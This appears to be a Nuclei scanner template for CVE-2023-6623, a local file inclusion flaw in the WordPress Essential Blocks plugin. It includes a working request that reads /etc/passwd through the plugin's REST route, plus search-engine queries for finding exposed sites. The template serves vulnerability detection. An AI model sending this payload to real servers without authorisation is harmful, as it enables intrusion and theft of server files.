daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-6623.yaml

49 lines
2.2 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-6623
info:
name: Essential Blocks < 4.4.3 - Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch,coldfish
severity: critical
description: |
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
remediation: |
Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
reference:
- https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
- https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6623
cwe-id: CWE-22
epss-score: 0.07821
epss-percentile: 0.94063
cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpdeveloper
product: essential_blocks
framework: wordpress
shodan-query: http.html:/wp-content/plugins/essential-blocks/
fofa-query: body=/wp-content/plugins/essential-blocks/
publicwww-query: "/wp-content/plugins/essential-blocks/"
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper
http:
- method: GET
path:
- '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
- '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "regex('root:.*:0:0:', body_1)"
- 'contains(body_2, "Essential Blocks Page")'
condition: and
# digest: 490a00463044022074608b993f54ad1c4a650efb6e94f7060a6eb7bbcb1b6a06d126af9f727eece302203c483f813b2de38dde9f6f4de6ae15eaaa6e18e056c051c0db9822342f974444:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink